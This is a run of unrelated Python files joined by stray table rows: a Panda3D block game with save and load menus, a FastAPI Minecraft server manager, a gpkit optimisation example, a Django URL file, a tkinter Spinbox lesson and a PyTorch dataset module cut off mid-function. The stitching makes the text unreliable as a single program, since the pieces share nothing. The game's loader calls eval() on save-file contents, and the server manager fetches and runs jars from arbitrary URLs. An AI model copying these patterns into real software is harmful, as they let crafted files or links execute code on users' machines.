        self.dim.setColor(0, 0, 0, 0.5)
        self.buttonModel = loader.loadModel('gfx/button')
        inputTexture = loader.loadTexture('gfx/tex/button_press.png')
        # Pause Screen
        self.unpauseButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
            relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, 0.3), text = "Resume Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = pause)
        self.saveButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
            relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, 0.15), text = "Save Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showSave)
        self.loadButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
            relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, -0.15), text = "Load Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showLoad)
        self.exitButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
            relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, -0.3), text = "Quit Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = exit)
        # Save Screen
        self.saveText = DirectLabel(text = "Type in a name for your world", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.saveScr, scale = 0.075, pos = (0,0,0.35))
        self.saveText2 = DirectLabel(text = "", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.saveScr, scale = 0.06, pos = (0,0,-0.45))
        self.saveName = DirectEntry(text = "", scale= .15, command=self.save, initialText="My World", numLines = 1, focus=1, frameTexture = inputTexture, parent = self.saveScr, text_fg = (1,1,1,1),
            pos = (-0.6, 0, 0.1), text_scale = 0.75)
        self.saveGameBtn = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
            relief = None, parent = self.saveScr, scale = 0.5, pos = (0, 0, -0.1), text = "Save", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.save)
        # NOTE(review): self.backButton is assigned again below for the load
        # screen, overwriting this reference (both buttons still render).
        self.backButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
            relief = None, parent = self.saveScr, scale = 0.5, pos = (0, 0, -0.25), text = "Back", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showPause)
        # Load Screen
        numItemsVisible = 3
        itemHeight = 0.15
        self.loadList = DirectScrolledList(
            decButton_pos= (0.35, 0, 0.5),
            decButton_text = "^",
            decButton_text_scale = 0.04,
            decButton_text_pos = (0, -0.025),
            decButton_text_fg = (1, 1, 1, 1),
            decButton_borderWidth = (0.005, 0.005),
            decButton_scale = (1.5, 1, 2),
            decButton_geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
            decButton_geom_scale = 0.1,
            decButton_relief = None,
            incButton_pos= (0.35, 0, 0),
            incButton_text = "^",
            incButton_text_scale = 0.04,
            incButton_text_pos = (0, -0.025),
            incButton_text_fg = (1, 1, 1, 1),
            incButton_borderWidth = (0.005, 0.005),
            incButton_hpr = (0,180,0),
            incButton_scale = (1.5, 1, 2),
            incButton_geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
            incButton_geom_scale = 0.1,
            incButton_relief = None,
            frameSize = (-0.4, 1.1, -0.1, 0.59),
            frameTexture = inputTexture,
            frameColor = (1, 1, 1, 0.75),
            pos = (-0.45, 0, -0.25),
            scale = 1.25,
            numItemsVisible = numItemsVisible,
            forceHeight = itemHeight,
            itemFrame_frameSize = (-0.2, 0.2, -0.37, 0.11),
            itemFrame_pos = (0.35, 0, 0.4),
            itemFrame_frameColor = (0,0,0,0),
            parent = self.loadScr
            )
        self.backButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
            relief = None, parent = self.loadScr, scale = 0.5, pos = (0, 0, -0.5), text = "Back", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showPause)
        self.loadText = DirectLabel(text = "Select World", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.loadScr, scale = 0.075, pos = (0,0,0.55))
        self.loadText2 = DirectLabel(text = "", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.loadScr, scale = 0.075, pos = (0,0,-0.7))
        self.hide()
    def showPause(self):
        """Show the pause screen (and the dim backdrop), hiding the others."""
        self.saveScr.stash()
        self.loadScr.stash()
        self.pauseScr.unstash()
        self.dim.unstash()
    def showSave(self):
        """Swap the pause screen for the save screen and clear its status text."""
        self.pauseScr.stash()
        self.saveScr.unstash()
        self.saveText2['text'] = ""
    def showLoad(self):
        """Swap to the load screen and repopulate the list from saves/."""
        self.pauseScr.stash()
        self.loadScr.unstash()
        self.loadText2['text'] = ""
        self.loadList.removeAndDestroyAllItems()
        f = []
        if not os.path.exists('saves/'):
            os.makedirs('saves/')
        # Only the top level of saves/ is scanned (break after first walk step).
        for (dirpath, dirnames, filenames) in os.walk('saves/'):
            f.extend(filenames)
            break
        for file in f:
            # NOTE(review): strip('.sav') removes any leading/trailing
            # '.', 's', 'a', 'v' characters, not just the extension --
            # display names like "savanna.sav" will be mangled.
            l = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')),
                relief = None, scale = 0.5, pos = (0, 0, -0.75), text = file.strip('.sav'), text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.load, extraArgs = [file])
            self.loadList.addItem(l)
    def save(self, worldName = None):
        """Write every non-AIR block to saves/<worldName>.sav (Python 2)."""
        self.saveText2['text'] = "Saving..."
        if worldName == None:
            worldName = self.saveName.get(True)
        print "Saving %s..." % worldName
        dest = 'saves/%s.sav' % worldName
        dir = os.path.dirname(dest)
        if not os.path.exists(dir):
            os.makedirs(dir)
        try:
            f = open(dest, 'wt')
        except IOError:
            self.saveText2['text'] = "Could not save. Make sure the world name does not contain the following characters: \\ / : * ? \" < > |"
            print "Failed!"
            return
        for key in world:
            if world[key].type == AIR:
                continue
            f.write(str(key) + ':')
            f.write(str(world[key].type) + '\n')
        f.close()
        self.saveText2['text'] = "Saved!"
        print "Saved!"
    def load(self, worldName):
        """Replace the current world with the blocks stored in a save file."""
        self.loadText2['text'] = "Loading..."
        print "Loading..."
        f = open('saves/%s' % worldName, 'r')
        toLoad = f.read().split('\n')
        toLoad.pop() # get rid of newline
        # Clear the existing world before loading the saved blocks.
        for key in world:
            addBlock(AIR, key[0], key[1], key[2])
        world.clear()
        for key in toLoad:
            key = key.split(':')
            # NOTE(review): eval() of the coordinate tuple trusts the save
            # file's contents -- a literal_eval would be safer.
            posTup = eval(key[0])
            addBlock(int(key[1]), posTup[0], posTup[1], posTup[2])
        f.close()
        self.loadText2['text'] = "Loaded!"
        print "Loaded!"
    def hide(self):
        """Hide all menu screens and the dim backdrop."""
        self.pauseScr.stash()
        self.loadScr.stash()
        self.saveScr.stash()
        self.dim.stash()
pauseScreen = PauseScreen()  # singleton pause/save/load menu
def addBlock(blockType, x, y, z):
    """Place a block of *blockType* at (x, y, z), replacing any existing block."""
    # Free the old block's resources first. KeyError means the cell was empty;
    # the original bare except also hid unrelated errors from cleanup().
    try:
        world[(x, y, z)].cleanup()
    except KeyError:
        pass
    world[(x, y, z)] = Block(blockType, x, y, z)
# Generate a 16x16 field of surface blocks using simplex noise (Python 2).
for x in xrange(0, 16):
    for y in xrange(0, 16):
        # NOTE(review): randrange with float bounds relies on Python 2
        # accepting integral floats -- confirm intent.
        amplitude = random.randrange(0.0,5.0)
        blockType = DIRT
        if wantNewGeneration:
            # Layered noise: elevation plus roughness*detail, clamped to [0, 128].
            z = max(min(int(snoise2(x / freq, y / freq, octavesElev)+(snoise2(x / freq, y / freq, octavesRough)*snoise2(x / freq, y / freq, octavesDetail))*64+64), 128), 0)
            addBlock(blockType,x,y,z)
        else:
            z = max((int(snoise2(x / freq, y / freq, 5) * amplitude)+8), 0)
            addBlock(blockType,x,y,z)
            if fillWorld:
                # Also fill every cell below the surface block.
                for height in xrange(0, z+1):
                    addBlock(blockType,x,y,height)
        if verboseLogging:
            print "Generated %s at (%d, %d, %d)" % (blockNames[blockType], x, y, z)
# Ambient light so unlit faces are not pitch black.
alight = AmbientLight('alight')
alight.setColor(VBase4(0.6, 0.6, 0.6, 1))
alnp = render.attachNewNode(alight)
render.setLight(alnp)
# Overhead spotlight positioned high above the terrain, pointing down.
slight = Spotlight('slight')
slight.setColor(VBase4(1, 1, 1, 1))
lens = PerspectiveLens()
slight.setLens(lens)
slnp = render.attachNewNode(slight)
slnp.setPos(8, -9, 128)
slnp.setHpr(0,270,0)
render.setLight(slnp)
if fancyRendering:
    # Use a 512x512 resolution shadow map
    slight.setShadowCaster(True, 512, 512)
    # Enable the shader generator for the receiving nodes
    render.setShaderAuto()
# Mouse picking: a collision ray attached to the camera, results queued.
traverser = CollisionTraverser()
handler = CollisionHandlerQueue()
pickerNode = CollisionNode('mouseRay')
pickerNP = camera.attachNewNode(pickerNode)
pickerNode.setFromCollideMask(GeomNode.getDefaultCollideMask())
pickerRay = CollisionRay()
pickerNode.addSolid(pickerRay)
traverser.addCollider(pickerNP, handler)
def handlePick(right=False):
    """Cast a ray from the mouse cursor and act on the clicked block.

    right=False removes the clicked block; right=True attempts to place the
    current block against the clicked face.
    """
    if paused:
        return # ignore clicks while the pause menu is open
    if base.mouseWatcherNode.hasMouse():
        mpos = base.mouseWatcherNode.getMouse()
        pickerRay.setFromLens(base.camNode, mpos.getX(), mpos.getY())
        traverser.traverse(render)
        if handler.getNumEntries() > 0:
            # Sort so entry 0 is the closest hit.
            handler.sortEntries()
            pickedObj = handler.getEntry(0).getIntoNodePath()
            pickedObj = pickedObj.findNetTag('blockTag')
            if not pickedObj.isEmpty():
                if right:
                    # Each flag is True when the corresponding face tag was
                    # NOT found on the hit node -- see handleRightPickedObject.
                    handleRightPickedObject(pickedObj, handler.getEntry(0).getIntoNodePath().findNetTag('westTag').isEmpty(),
                        handler.getEntry(0).getIntoNodePath().findNetTag('northTag').isEmpty(), handler.getEntry(0).getIntoNodePath().findNetTag('eastTag').isEmpty(),
                        handler.getEntry(0).getIntoNodePath().findNetTag('southTag').isEmpty(), handler.getEntry(0).getIntoNodePath().findNetTag('topTag').isEmpty(),
                        handler.getEntry(0).getIntoNodePath().findNetTag('botTag').isEmpty())
                else:
                    handlePickedObject(pickedObj)
def hotbarSelect(slot):
    """Select hotbar slot *slot* (1-based) and update the HUD label."""
    global currentBlock
    currentBlock = inventory[slot-1]
    currentBlockText["text"] = blockNames[currentBlock]
    if verboseLogging:
        print "Selected hotbar slot %d" % slot
        print "Current block: %s" % blockNames[currentBlock]
# Input bindings: left click removes a block, right click places one,
# Escape toggles the pause menu, keys 1-9 select a hotbar slot.
base.accept('mouse1', handlePick)
base.accept('mouse3', handlePick, extraArgs=[True])
base.accept('escape', pause)
base.accept('1', hotbarSelect, extraArgs=[1])
base.accept('2', hotbarSelect, extraArgs=[2])
base.accept('3', hotbarSelect, extraArgs=[3])
base.accept('4', hotbarSelect, extraArgs=[4])
base.accept('5', hotbarSelect, extraArgs=[5])
base.accept('6', hotbarSelect, extraArgs=[6])
base.accept('7', hotbarSelect, extraArgs=[7])
base.accept('8', hotbarSelect, extraArgs=[8])
base.accept('9', hotbarSelect, extraArgs=[9])
def handlePickedObject(obj):
    """Remove the clicked block by overwriting it with AIR."""
    if verboseLogging:
        print "Left clicked a block at %d, %d, %d" % (obj.getX(), obj.getY(), obj.getZ())
    addBlock(AIR, obj.getX(), obj.getY(), obj.getZ())
def handleRightPickedObject(obj, west, north, east, south, top, bot):
    """Place the current block against the first clicked face of *obj*.

    Each of west/north/east/south/top/bot is True when that face's tag was
    absent from the picked node (see handlePick).
    """
    if verboseLogging:
        print "Right clicked a block at %d, %d, %d, attempting to place %s" % (obj.getX(), obj.getY(), obj.getZ(), blockNames[currentBlock])
    try:
        # not [block face] checks to see if the user clicked on [block face]. this is not confusing at all.
        if world[(obj.getX()-1, obj.getY(), obj.getZ())].type == AIR and not west:
            addBlock(currentBlock, obj.getX()-1, obj.getY(), obj.getZ())
        elif world[(obj.getX()+1, obj.getY(), obj.getZ())].type == AIR and not east:
            addBlock(currentBlock, obj.getX()+1, obj.getY(), obj.getZ())
        elif world[(obj.getX(), obj.getY()-1, obj.getZ())].type == AIR and not south:
            addBlock(currentBlock, obj.getX(), obj.getY()-1, obj.getZ())
        elif world[(obj.getX(), obj.getY()+1, obj.getZ())].type == AIR and not north:
            addBlock(currentBlock, obj.getX(), obj.getY()+1, obj.getZ())
        elif world[(obj.getX(), obj.getY(), obj.getZ()+1)].type == AIR and not top:
            addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()+1)
        elif world[(obj.getX(), obj.getY(), obj.getZ()-1)].type == AIR and not bot:
            addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()-1)
    except KeyError:
        # The neighboring cell is not in `world` at all: treat it as empty
        # and place against the first clicked face.
        if not west:
            addBlock(currentBlock, obj.getX()-1, obj.getY(), obj.getZ())
        elif not east:
            addBlock(currentBlock, obj.getX()+1, obj.getY(), obj.getZ())
        elif not south:
            addBlock(currentBlock, obj.getX(), obj.getY()-1, obj.getZ())
        elif not north:
            addBlock(currentBlock, obj.getX(), obj.getY()+1, obj.getZ())
        elif not top:
            addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()+1)
        elif not bot:
            addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()-1)
# Light-blue distance fog, a capped far plane, then start the main loop.
fog = Fog("fog")
fog.setColor(0.5294, 0.8078, 0.9215)
fog.setExpDensity(0.015)
render.setFog(fog)
base.camLens.setFar(256)
base.run()
| 16,027 | 5,768 |
from json.decoder import JSONDecodeError
from fastapi import FastAPI, Response, Request
from fastapi.staticfiles import StaticFiles
from argparse import ArgumentParser
from starlette.status import *
from starlette.responses import FileResponse, JSONResponse
import uvicorn
import os
from pymongo import MongoClient
from pymongo.database import Database
import json
from util import fetch_jarinfo, defaults
import logging
from logging import debug, info, warning, error, critical, exception
import threading
import time
from models import *
import hashlib
import random
import server_manager
import requests
import base64
# Maps issued auth key -> issue time; entries expire after
# CONFIG['connection_timeout'] seconds (purged in the auth middleware).
AUTHENTICATED_CONNECTIONS = {}
def fetch_loop(db: Database):
    """Background loop: periodically refresh the cached jar/version listing.

    Fetches version info via fetch_jarinfo, upserts it into the `versions`
    collection (exactly one document, keyed by record='versions'), then sleeps.
    """
    WAIT = 12 # Delay between fetches (hours)
    while True:
        info('Fetching minecraft version info.')
        jar_info = fetch_jarinfo()
        jar_info['record'] = 'versions'
        info('Found {mc} vanilla versions and {paper} papermc versions. Latest version is {latest}. Latest snapshot is {latest_snap}.'.format(
            mc=str(len(jar_info['vanilla'])),
            paper=str(len(jar_info['paper'])),
            latest=jar_info['latest']['release'],
            latest_snap=jar_info['latest']['snapshot']
        ))
        db.versions.replace_one({'record': 'versions'}, jar_info, upsert=True)
        time.sleep(WAIT * 3600)
if __name__ == '__main__':
    # Launched directly: read the config file, stash it in an env var so the
    # uvicorn-imported module instance can retrieve it, then start uvicorn.
    parser = ArgumentParser(description='Run minecraft-socket server.')
    parser.add_argument('--config', default='config.json', help='Path to config file (JSON)')
    args = parser.parse_args()
    try:
        with open(args.config, 'r') as c:
            os.environ['MC-CONFIG'] = json.dumps(json.load(c))
    except JSONDecodeError:
        print('FATAL: Bad JSON structure.')
        exit(0)
    except FileNotFoundError:
        print(f'FATAL: {args.config} not found.')
        exit(0)
    CONF = json.loads(os.environ['MC-CONFIG'])
    uvicorn.run('main:app', host=CONF['runtime']['host'], port=CONF['runtime']['port'], access_log=False)
else:
    # Imported (by uvicorn): build logging, the Mongo connection, the version
    # fetch thread, the server manager and finally the FastAPI app.
    try:
        CONFIG = json.loads(os.environ['MC-CONFIG'])
    except:
        # NOTE(review): bare except also hides unrelated errors here.
        print(f'FATAL: config not loaded.')
        exit(0)
    logging.basicConfig(
        format=CONFIG["logging"]["format"],
        level=logging.getLevelName(CONFIG["logging"]["level"].upper()),
    )
    info('Loading connection to DB')
    db = CONFIG['database']
    mongodb = MongoClient(
        host=db['ip'],
        port=db['port'],
        username=db['username'],
        password=db['password'],
        tls=db['secure']
    )
    database = mongodb.minecraft_socket
    info('Starting fetch thread.')
    # Daemon thread: dies with the process, no join needed.
    fetch_thread = threading.Thread(target=fetch_loop, name='mcjar_fetch_thread', daemon=True, args=[database])
    fetch_thread.start()
    info('Checking env setup.')
    if not os.path.exists(CONFIG['server_folder']):
        os.makedirs(CONFIG['server_folder'])
    info('Starting server manager.')
    manager = server_manager.ServerManager(CONFIG['server_folder'], database)
    app = FastAPI()
    app.mount('/web', StaticFiles(directory='web'), 'staticfiles')
@app.get('/')
async def get_index():
    """Serve the web UI's index page."""
    return FileResponse(os.path.join('web', 'index.html'))
@app.middleware('http')
async def auth(request: Request, call_next):
    """Require a valid x-authkey header on everything except /, /web/* and /auth.

    Also expires auth keys older than CONFIG['connection_timeout'] seconds.
    """
    # Purge expired keys; iterate a copy since we delete while looping.
    for k in list(AUTHENTICATED_CONNECTIONS.keys()):
        if AUTHENTICATED_CONNECTIONS[k]+CONFIG['connection_timeout'] < time.time():
            del AUTHENTICATED_CONNECTIONS[k]
    if request.url.path == '/' or request.url.path.startswith('/web') or request.url.path == '/auth':
        return await call_next(request)
    else:
        if 'x-authkey' in request.headers.keys():
            if request.headers['x-authkey'] in AUTHENTICATED_CONNECTIONS.keys():
                return await call_next(request)
            else:
                return JSONResponse({'result': 'failure', 'reason': 'Auth key not recognized.'}, HTTP_403_FORBIDDEN)
        else:
            return JSONResponse({'result': 'failure', 'reason': 'Auth key not passed in headers.'}, HTTP_403_FORBIDDEN)
@app.post('/auth')
async def post_auth(request: Request, response: Response):
    """Exchange a SHA-256 password hash for a temporary connection id.

    NOTE(review): the client submits the hash itself, so the hash effectively
    *is* the password (pass-the-hash) -- confirm this is acceptable.
    """
    model = await request.json()
    hashed_pass = hashlib.sha256(CONFIG['password'].encode('utf-8')).hexdigest()
    if hashed_pass == model['passhash']:
        # Connection id derived from current time plus randomness.
        cid = hashlib.sha256(str(time.time()+random.random()).encode('utf-8')).hexdigest()
        AUTHENTICATED_CONNECTIONS[cid] = time.time()
        return {'result': 'success', 'connection_id': cid}
    else:
        response.status_code = HTTP_403_FORBIDDEN
        return {'result': 'failure', 'reason': 'Incorrect passcode.'}
@app.get('/versions')
async def get_versions(response: Response, request: Request):
    """Return the cached version listing, or an empty shell when unavailable."""
    try:
        res = database.versions.find_one({'record': 'versions'})
        # Strip Mongo bookkeeping fields before returning the document
        # (raises if no document has been cached yet, handled below).
        del res['_id']
        del res['record']
        return res
    except Exception:
        # Fix: was a bare `except:` which also swallowed SystemExit and
        # KeyboardInterrupt. Fall back to an empty listing on any failure.
        return {
            'latest': {'release': None, 'snapshot': None},
            'paper': {},
            'vanilla': {}
        }
@app.post('/servers/new')
async def new_server(req: Request, res: Response):
    """Create a new server: folder, eula, server.properties, DB record, jar.

    The request body may override any of the defaults below and must also
    contain 'jar': either an http(s) URL or a base64-encoded jar payload.
    """
    fields = defaults(await req.json(), defs={
        'max_memory': 2, # GB
        'name': f'server_{int(time.time())}',
        'server_port': 25565,
        'server_ip': '',
        'world_seed': '',
        'whitelist': True,
        'max_players': 20,
        'difficulty': 'hard',
        'gamemode': 'survival',
        'motd': 'Minecraft Server Running on Minecraft-Socket [iTecAI]',
        'command_blocks': True,
        'other_args': ''
    }) # also requires {jar: url or base-64 encoded jar}
    if os.path.exists(os.path.join(CONFIG['server_folder'], fields['name'])):
        res.status_code = HTTP_405_METHOD_NOT_ALLOWED
        return {'result': 'failure', 'reason': f'Server {fields["name"]} already exists.'}
    if not 'jar' in fields.keys():
        res.status_code = HTTP_400_BAD_REQUEST
        return {'result': 'failure', 'reason': 'Server jar not specified'}
    info(f'Creating new server {fields["name"]} running at {fields["server_ip"]}:{fields["server_port"]}.')
    os.mkdir(os.path.join(CONFIG['server_folder'], fields['name']))
    # Pre-accept the EULA so the server can start unattended.
    with open(os.path.join(CONFIG['server_folder'], fields['name'], 'eula.txt'), 'w') as f:
        f.write('eula=true')
    # Fill the server.properties template with the requested settings.
    with open('server.properties.template', 'r') as f:
        properties = f.read().format(
            gamemode=fields['gamemode'],
            cmdblocks='true' if fields['command_blocks'] else 'false',
            motd=fields['motd'],
            seed=fields['world_seed'],
            difficulty=fields['difficulty'],
            max_players=str(fields['max_players']),
            server_ip=fields['server_ip'],
            server_port=str(fields['server_port']),
            whitelist='true' if fields['whitelist'] else 'false'
        )
    with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.properties'), 'w') as f:
        f.write(properties)
    database.servers.insert_one({
        'max_memory': fields['max_memory'],
        'name': fields['name'],
        'java_args': fields['other_args'],
        'address': fields['server_ip']+':'+str(fields['server_port']),
        'enabled': True
    })
    # NOTE(review): substring (not prefix) check to distinguish URL jars from
    # base64 payloads -- confirm payloads can never contain 'http://'.
    if 'https://' in fields['jar'] or 'http://' in fields['jar']:
        response = requests.get(fields['jar'], stream=True)
        with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.jar'), 'wb') as fd:
            for chunk in response.iter_content(chunk_size=128):
                fd.write(chunk)
    else:
        # Expecting a data-URI style value: everything after 'base64,' is the jar.
        with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.jar'), 'wb') as fd:
            fd.write(base64.b64decode(fields['jar'].split('base64,')[1].encode('utf-8')))
    manager.start_server(fields['name'])
    return {'result': 'success'}
@app.post('/servers/{name}/stop')
async def stop_server(name: str, res: Response):
    """Stop a running server; 404 when it is not currently online."""
    try:
        manager.stop_server(name)
        return {'result': 'success'}
    except KeyError:
        res.status_code = HTTP_404_NOT_FOUND
        return {'result': 'failure', 'reason': f'Server {name} not online.'}
@app.post('/servers/{name}/delete')
async def delete_server(name: str, res: Response):
    """Delete a server's DB record, stopping it first if it is online."""
    try:
        manager.stop_server(name)
    except KeyError:
        # Already offline; nothing to stop.
        pass
    database.servers.delete_one({'name': name})
    return {'result': 'success'}
@app.get('/servers/{name}/logs')
async def get_logs(name: str, res: Response):
    """Return the console logs of a running server; 404 when offline."""
    try:
        # Fix: the original called manager.get_logs(name) twice, discarding
        # the first result.
        return {'result': 'success', 'logs': manager.get_logs(name)}
    except KeyError:
        res.status_code = HTTP_404_NOT_FOUND
        return {'result': 'failure', 'reason': f'Server {name} not online.'}
@app.post('/servers/{name}/command')
async def command_server(name: str, res: Response, req: Request):
    """Send a console command to a running server; 404 when offline."""
    fields = await req.json()
    # Idiomatic membership test (was: `if not 'command' in fields.keys()`).
    if 'command' not in fields:
        res.status_code = HTTP_400_BAD_REQUEST
        return {'result': 'failure', 'reason': 'Command not passed'}
    try:
        manager.command_server(name, fields['command'])
    except KeyError:
        res.status_code = HTTP_404_NOT_FOUND
        return {'result': 'failure', 'reason': f'Server {name} not online.'}
    return {'result': 'success'}
@app.post('/servers/{name}/start')
async def start_server(name: str, res: Response):
    """Start a server by name; 404 when the manager does not know it."""
    try:
        manager.start_server(name)
    except KeyError:
        res.status_code = HTTP_404_NOT_FOUND
        # NOTE(review): 'not online' reads oddly for a failed *start* --
        # confirm the intended wording.
        return {'result': 'failure', 'reason': f'Server {name} not online.'}
    return {'result': 'success'}
@app.post('/servers/{name}/modify_prop')
async def modify_prop(name: str, res: Response, req: Request):
    """Overwrite a server's server.properties with the supplied content.

    Renamed from start_server: three handlers shared that name, shadowing
    each other at module level.
    """
    fields = await req.json()
    if 'content' not in fields:
        res.status_code = HTTP_400_BAD_REQUEST
        return {'result': 'failure', 'reason': 'Content not passed.'}
    if database.servers.find_one({'name': name}):
        with open(os.path.join(CONFIG['server_folder'], name, 'server.properties'), 'w') as f:
            f.write(fields['content'])
        # Fix: the original fell through and returned null on success;
        # report success explicitly, consistent with the other handlers.
        return {'result': 'success'}
    else:
        res.status_code = HTTP_404_NOT_FOUND
        return {'result': 'failure', 'reason': f'Server {name} does not exist.'}
@app.post('/servers/{name}/modify_spec')
async def modify_spec(name: str, res: Response, req: Request):
    """Replace a server's DB spec document with the supplied JSON content.

    Renamed from start_server: three handlers shared that name, shadowing
    each other at module level.
    """
    fields = await req.json()
    if 'content' not in fields:
        res.status_code = HTTP_400_BAD_REQUEST
        return {'result': 'failure', 'reason': 'Content not passed.'}
    if database.servers.find_one({'name': name}):
        try:
            database.servers.replace_one({'name': name}, json.loads(fields['content']))
            return {'result': 'success'}
        except Exception:
            # Fix: was a bare `except:`; bad JSON (or a bad document) lands here.
            res.status_code = HTTP_400_BAD_REQUEST
            return {'result': 'failure', 'reason': 'Bad content format.'}
    else:
        res.status_code = HTTP_404_NOT_FOUND
        return {'result': 'failure', 'reason': f'Server {name} does not exist.'}
@app.get('/servers/{name}/')
async def get_server_info(name: str, res: Response):
    """Return a server's DB spec, its server.properties text and run state."""
    spec = database.servers.find_one({'name': name})
    if spec:
        # Strip Mongo's internal id before returning the document.
        del spec['_id']
        with open(os.path.join(CONFIG['server_folder'], name, 'server.properties'), 'r') as f:
            props = f.read()
        return {
            'result': 'success',
            'spec': spec,
            'prop': props,
            'running': name in manager.servers.keys()
        }
    else:
        res.status_code = HTTP_404_NOT_FOUND
        return {'result': 'failure', 'reason': f'Server {name} does not exist.'}
@app.get('/servers')
async def list_servers():
    """Summarize every known server that still has a folder on disk."""
    summary = {}
    for spec in database.servers.find():
        # Skip DB records whose server folder has been removed.
        if not os.path.exists(os.path.join(CONFIG['server_folder'], spec['name'])):
            continue
        summary[spec['name']] = {
            'autostart': spec['enabled'],
            'running': spec['name'] in manager.servers.keys(),
            'address': spec['address'],
            'mem': spec['max_memory'],
        }
    return summary
# OpenWeather API key used to access the service's resources.
# NOTE(review): placeholder value -- supply a real key, and avoid committing secrets.
api_key = "enter your key here"
| 82 | 26 |
"""Adapted from t_SP in tests/t_geometric_program.py"""
import gpkit
# Decision variables
x = gpkit.Variable('x')
y = gpkit.Variable('y')
# must enable signomials for subtraction
with gpkit.SignomialsEnabled():
constraints = [x >= 1-y, y <= 0.1]
# create and solve the SP
m = gpkit.Model(x, constraints)
print(m.localsolve(verbosity=0).summary())
assert abs(m.solution(x) - 0.9) < 1e-6
# full interim solutions are available
print("x values of each GP solve (note convergence)")
print(", ".join("%.5f" % sol["freevariables"][x] for sol in m.program.results))
| 567 | 210 |
from django.urls import path
from cride.circles.views import ListCreateAPIView
# Route the app root to the circles list/create endpoint.
# (Fix: stray table-artifact tokens after the closing bracket broke the syntax.)
urlpatterns = [
    path('', ListCreateAPIView.as_view()),
]
# Lesson 75 - SpinBox
from tkinter import *
app = Tk()
app.title('Pedroso')
app.geometry('500x300')
def exibirValor():
    """Copy the spinbox's current value into the label below it."""
    vvalor = sb_valores.get()
    l_valor.config(text=vvalor)
# sb_valores = Spinbox(app, from_=0, to=10)
# The values can be given as a range, as above,
# or as an explicit tuple, as below.
sb_valores = Spinbox(app, values=(2, 4, 6, 8, 10))
sb_valores.pack()
l_valor = Label(app, text='Valor')
l_valor.pack()
btn_exibeValor = Button(app, text='Exibe Valor', command=exibirValor)
btn_exibeValor.pack()
app.mainloop()
| 550 | 251 |
"""This file contains all functions related to the dataset."""
# pylint: disable=import-error
import os
import tqdm
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from torch.utils.data import Dataset
class RegressionDataset(Dataset):
    """Minimal map-style Dataset pairing features with regression targets."""

    def __init__(self, x_data, y_data):
        # Store references to the provided arrays; no copies are made.
        self.x_data, self.y_data = x_data, y_data

    def __getitem__(self, index):
        # A sample is the (features, target) pair at *index*.
        return self.x_data[index], self.y_data[index]

    def __len__(self):
        # Dataset length is the number of targets.
        return len(self.y_data)
def basic_random_split(path_to_train, valid_ratio=0.2):
    """This function split file according to a ratio to create
    training and validation.

    Args:
        path_to_train (str): path of the data root directory.
        valid_ratio (float): ratio of data for validation dataset.

    Returns:
        dict: Dictionary containing every data to create a Dataset.
    """
    # Pipeline: read raw files, strip identifier columns, then split
    # into train/validation arrays.
    raw_data = load_files(path_to_data=path_to_train)
    cleaned = remove_useless_features(training_data=raw_data)
    return create_x_and_y(input_data=cleaned, valid_ratio=valid_ratio)
def load_test_data(path_to_test):
    """Load the test split and pair it with constant placeholder targets.

    Args:
        path_to_test (str): path of the data root directory.

    Returns:
        dict: ``{"x_test": ndarray of features,
                 "y_test": 1-D ndarray of ones (dummy targets)}``.
    """
    # Load the different files
    test_data = load_files(path_to_data=path_to_test)
    # Drop the identifier column: it is not a predictive feature.
    x_test = test_data["input"].drop(columns=["_ID"])
    # Bug fix: the original also wrote a second, identical np.ones array
    # into test_data["target"] that was never read -- dead code removed.
    # The test set has no labels, so a constant y vector of matching
    # length keeps the downstream Dataset API happy.
    return {
